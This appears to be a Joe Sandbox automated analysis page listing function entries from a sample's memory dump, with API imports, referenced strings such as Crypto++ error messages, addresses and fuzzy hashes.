Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 2ba23c1be2220e5bdefe784d4f810585cef19c5a89aab65cbad12e159b3cb0d3
Instruction ID: f75f6559efa6e8c3eba8e5a9a31d3ad05263db480ab8fd961a26d049dabc30cc
Opcode Fuzzy Hash: 2ba23c1be2220e5bdefe784d4f810585cef19c5a89aab65cbad12e159b3cb0d3
Instruction Fuzzy Hash: 3641D371B29B8596EF20AB16A6002A9A751EB04BD0F440A31DF7D8B7C5EF7CF0419300

Function 00007FF6F18A2800 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__std_fs_code_page.MSVCPRT ref: 00007FF6F18A285F

Part of subcall function 00007FF6F18CD2C4: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF6F18A21C6), ref: 00007FF6F18CD2C8
Part of subcall function 00007FF6F18CD2C4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF6F18A21C6), ref: 00007FF6F18CD2D7

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A29DD
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A2A2B

Strings

: ", xrefs: 00007FF6F18A291A
", ", xrefs: 00007FF6F18A294D

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ApisFile___lc_codepage_func__std_fs_code_page
String ID: ", "$: "
API String ID: 956348032-747220369
Opcode ID: 1c32021f7766b0db3a440ab755a33d21fe294151afbe42d702202e4415480f22
Instruction ID: 5701f5560d312964e8c708c373aec272fbbaa2bc23f2d0e180625fdc0a8b2bfe
Opcode Fuzzy Hash: 1c32021f7766b0db3a440ab755a33d21fe294151afbe42d702202e4415480f22
Instruction Fuzzy Hash: 34615972B24B419AEB10DB65D6403AC2362EB48BD8F408526DE7D57BD9EF38D552C380

Function 00007FF6F18AB6E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

__std_fs_code_page.MSVCPRT ref: 00007FF6F18AB70C
__std_fs_convert_wide_to_narrow.LIBCPMT ref: 00007FF6F18AB757
__std_fs_convert_wide_to_narrow.LIBCPMT ref: 00007FF6F18AB798
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AB817

Part of subcall function 00007FF6F18A1BA0: _CxxThrowException.VCRUNTIME140 ref: 00007FF6F18A1BD3

Part of subcall function 00007FF6F18A18C0: _CxxThrowException.VCRUNTIME140 ref: 00007FF6F18A18F1
Part of subcall function 00007FF6F18A18C0: __std_exception_copy.VCRUNTIME140 ref: 00007FF6F18A1928

Strings

"\, xrefs: 00007FF6F18AB7CC

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ExceptionThrow__std_fs_convert_wide_to_narrow$__std_exception_copy__std_fs_code_page_invalid_parameter_noinfo_noreturn
String ID: "\
API String ID: 1578578930-2226538752
Opcode ID: 48f9e33a93e28ea5dae35284aff142529909d3831eb526addcc4aebaa457ff5e
Instruction ID: 37edb659eb30d73593488ffe4f9862bb0b91be467e6289a6f2c9a3158d5e7b2e
Opcode Fuzzy Hash: 48f9e33a93e28ea5dae35284aff142529909d3831eb526addcc4aebaa457ff5e
Instruction Fuzzy Hash: 5E31A322B3878297EB509B65A14026EA651FB847D0F505236FABE83BD5EF7CD481C700

Function 00007FF6F18B5D50 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 426COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18B61ED
memmove.VCRUNTIME140 ref: 00007FF6F18B6200
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6F18B629E

Part of subcall function 00007FF6F18B5CA0: memmove.VCRUNTIME140(?,?,?,00007FF6F18B611F), ref: 00007FF6F18B5D0C
Part of subcall function 00007FF6F18B5CA0: memmove.VCRUNTIME140(?,?,?,00007FF6F18B611F), ref: 00007FF6F18B5D24

_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B62FD

Strings

FilterWithBufferedInput, xrefs: 00007FF6F18B62CA

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove$ExceptionThrowfree
String ID: FilterWithBufferedInput
API String ID: 3245812352-4021797063
Opcode ID: 45c0a1a949b7a3b5acdf1f267a2abc20fc9ece50c1a8545ba15ca6a3b01845c0
Instruction ID: ebeccaa97cee9cc4dc2ec5c4ce5b400404ae62366d6489f0c871ae77c0f1e236
Opcode Fuzzy Hash: 45c0a1a949b7a3b5acdf1f267a2abc20fc9ece50c1a8545ba15ca6a3b01845c0
Instruction Fuzzy Hash: 9802A972725B8596DB54CF22E6542AD77A0FB48BC0F988036DB6D83B91EF38E065C300

Function 00007FF6F18B2030 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 137COMMON

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B216B

Part of subcall function 00007FF6F18AFFD0: memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6F18B0197
Part of subcall function 00007FF6F18AFFD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6F18B0211

Part of subcall function 00007FF6F18AFC00: memmove.VCRUNTIME140 ref: 00007FF6F18AFDB4

_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B2236

Strings

is less than the minimum of , xrefs: 00007FF6F18B2120
: IV length , xrefs: 00007FF6F18B20F4, 00007FF6F18B21C8
exceeds the maximum of , xrefs: 00007FF6F18B21F1

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ExceptionThrowmemmove$_invalid_parameter_noinfo_noreturn
String ID: exceeds the maximum of $ is less than the minimum of $: IV length
API String ID: 1845102807-1273958906
Opcode ID: 3af9b81d17b566c186260205b66e8abf9318f64cf0d017f8cddf76f3fd633423
Instruction ID: 0b13293ef3c811244cb4523ad6eed7f5a98fcecbad541e0936ce3a8b64aba9b0
Opcode Fuzzy Hash: 3af9b81d17b566c186260205b66e8abf9318f64cf0d017f8cddf76f3fd633423
Instruction Fuzzy Hash: 76517F22729A8692EB10AB16D9503EE6361FF99FC0F404036DA6D877E9FF2CD509C740

Function 00007FF6F18B24F0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 113COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6F18B2594
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B266F

Strings

HashTransformation: can't truncate a , xrefs: 00007FF6F18B25FA
bytes, xrefs: 00007FF6F18B2638
byte digest to , xrefs: 00007FF6F18B260C

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ExceptionThrowfree
String ID: byte digest to $ bytes$HashTransformation: can't truncate a
API String ID: 2053033275-1139078987
Opcode ID: 87c5a9f9edb3221ac16b5caf1f274c246aa6255a798e30822e83d67168a29bf8
Instruction ID: d147393e1167187171254841ea60c11d1008144f8c3735c038c78386c569c3fa
Opcode Fuzzy Hash: 87c5a9f9edb3221ac16b5caf1f274c246aa6255a798e30822e83d67168a29bf8
Instruction Fuzzy Hash: 0831D522729A8255EB10EB12E9503EA6351BF89BD0F444231EE7E87BD6FF3CE5058700

Function 00007FF6F18B9E90 Relevance: 7.6, APIs: 5, Instructions: 92COMMON

Download Yara Rule

APIs

__std_type_info_compare.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FF6F18AF086), ref: 00007FF6F18B9EB5
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF6F18AF086), ref: 00007FF6F18B9F84
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF6F18AF086), ref: 00007FF6F18B9F90

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: __std_type_info_compare_errno_invalid_parameter_noinfo
String ID:
API String ID: 4158822619-0
Opcode ID: fb99e7623bcde8bcaad4a989abea06bc1f781d16d413e6109da22a0dd0bcb038
Instruction ID: bc18eb22ede3182e5bcd4971a60b5ce2662b97eccd4fccbec75647879a675742
Opcode Fuzzy Hash: fb99e7623bcde8bcaad4a989abea06bc1f781d16d413e6109da22a0dd0bcb038
Instruction Fuzzy Hash: 76316D62E28B8292EB60CB24E6103B967A1AF457D0F444534EA7D93BD5FF3CE9458740

Function 00007FF6F18B3C50 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B3DF0
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B3E2F

Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE182
Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE190

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B3E7E

Strings

: unexpected channel name ", xrefs: 00007FF6F18B3CA9

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memmove
String ID: : unexpected channel name "
API String ID: 15630516-5263004
Opcode ID: 36860424f8d156f3827ed1b36230f4c2af6f07b42707bfaa1ba9219807778592
Instruction ID: 048ab09d0ffd93f8463364320fabebd4e1eea424a9a684d8867d25870d322ebd
Opcode Fuzzy Hash: 36860424f8d156f3827ed1b36230f4c2af6f07b42707bfaa1ba9219807778592
Instruction Fuzzy Hash: 5D616F62F24B858AEB00DB64D6503AC3361EB597D8F405336EA7C52BD9EF78E194C340

Function 00007FF6F18A2610 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6F18A1620: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A16D1

__std_exception_copy.VCRUNTIME140 ref: 00007FF6F18A268F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A26D3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A27BA

Strings

Unknown exception, xrefs: 00007FF6F18A2737

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: Unknown exception
API String ID: 1944019136-410509341
Opcode ID: 379b12ae010696974a2783e2f61ba81b06aea7a754c04ac4f4d5bd03ac2e1285
Instruction ID: 8a7705dd50d34e0aabe09ad0940e1f29b33a11009393c6a6f0b996ddb331edab
Opcode Fuzzy Hash: 379b12ae010696974a2783e2f61ba81b06aea7a754c04ac4f4d5bd03ac2e1285
Instruction Fuzzy Hash: C151B822E18B8592EB10DB38E5403A973A1FB99794F505335EABD426E5FF3CD585C700

Function 00007FF6F18B0960 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B0A3A
__std_exception_copy.VCRUNTIME140 ref: 00007FF6F18B0A9D

Strings

: this object doesn't support multiple channels, xrefs: 00007FF6F18B09B1
/, xrefs: 00007FF6F18B09A8

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
String ID: /$: this object doesn't support multiple channels
API String ID: 1109970293-537585387
Opcode ID: dc36f6becf20736dff3c3847e2f81588e69228c0c20982eb169749a5e6dfb864
Instruction ID: 0b3bae4351971fd73c770cd793cdee3c2624f8530afe711c1aa326c74813a8b6
Opcode Fuzzy Hash: dc36f6becf20736dff3c3847e2f81588e69228c0c20982eb169749a5e6dfb864
Instruction Fuzzy Hash: 15417E72A28B4692DB009F60E5802A97761FB48BD4F505232E6BC837E9FF3CD194C740

Function 00007FF6F18D0058 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

__current_exception.VCRUNTIME140 ref: 00007FF6F18D008D
__current_exception_context.VCRUNTIME140 ref: 00007FF6F18D00A1
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18D00A9

Strings

csm, xrefs: 00007FF6F18D0079

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: __current_exception__current_exception_contextterminate
String ID: csm
API String ID: 2542180945-1018135373
Opcode ID: 008f842d458f98e56ad7bd350d53c0ce97974b7d909be2ee8e34882cacc6bd9e
Instruction ID: 3e8e969542b01d2674021a95a19660fd330d52d1a49a699544e7ca12a720e4e6
Opcode Fuzzy Hash: 008f842d458f98e56ad7bd350d53c0ce97974b7d909be2ee8e34882cacc6bd9e
Instruction Fuzzy Hash: 0AF04937515B40CAC3509F25E8801AC3764F78CB88B495231FB6D87795DF38C8909300

Function 00007FF6F18A9AE0 Relevance: 6.2, APIs: 4, Instructions: 151COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A9BD8
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A9C53
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A9C5A

Part of subcall function 00007FF6F18CDEB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6F18AC6D5), ref: 00007FF6F18CDECA

memset.VCRUNTIME140 ref: 00007FF6F18A9C9A

Part of subcall function 00007FF6F18AA4C0: memmove.VCRUNTIME140(?,?,000000F8,00007FF6F18A9CAB), ref: 00007FF6F18AA53A
Part of subcall function 00007FF6F18AA4C0: memmove.VCRUNTIME140 ref: 00007FF6F18AA5E6

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemmove$mallocmemsetterminate
String ID:
API String ID: 2098859242-0
Opcode ID: f2e50d5dfdcb3d44de8dd0ec76937119887d14485c865269fc8813566bc76e0e
Instruction ID: 419e51c49ea5b77b5b8b38c0cf949e03f6aec663cef9ba19ae22208f05be6ad2
Opcode Fuzzy Hash: f2e50d5dfdcb3d44de8dd0ec76937119887d14485c865269fc8813566bc76e0e
Instruction Fuzzy Hash: FB516D32B29A8592EF54DB65D29027863A1FB44FD4F548135DA7E87BC8EF3CD4918340

Function 00007FF6F18B2F40 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18B2F91
memmove.VCRUNTIME140 ref: 00007FF6F18B3068
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B30C3

Strings

RoundUpToMultipleOf: integer overflow, xrefs: 00007FF6F18B3096

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove$ExceptionThrow
String ID: RoundUpToMultipleOf: integer overflow
API String ID: 1747913114-1120416164
Opcode ID: bd3d2d3530773a31bcc3216a8ad391adf97e0b3264c7dac57fc02f0177ca89c1
Instruction ID: 3ade325436199f2544cc817c1e5612c1c9c361477d0212921454c0b02e92821c
Opcode Fuzzy Hash: bd3d2d3530773a31bcc3216a8ad391adf97e0b3264c7dac57fc02f0177ca89c1
Instruction Fuzzy Hash: 5B41D462B25A9586DF50DF2ADA443A8A362BF48FD4F488535DE2D83B94EF3CD4068300

Function 00007FF6F18A9610 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a338fdee72b02de291d65cd623cc7503b090a0e9557c46dc24a81594b608005
Instruction ID: 5a23c6384d019d1736ec40365e57f41a095779dffa6d6590da6db2f0977ad3b9
Opcode Fuzzy Hash: 7a338fdee72b02de291d65cd623cc7503b090a0e9557c46dc24a81594b608005
Instruction Fuzzy Hash: 2F514E36A18B8196DB508F29E56036D77A1FB84BE4F544236DAADC37E8EF39C448C710

Function 00007FF6F18AB970 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(00000000,?,?,00000000,00007FF6F18A210E), ref: 00007FF6F18ABA6F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00000000,00007FF6F18A210E), ref: 00007FF6F18ABAB2
memmove.VCRUNTIME140(00000000,?,?,00000000,00007FF6F18A210E), ref: 00007FF6F18ABABC
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18ABAF7

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

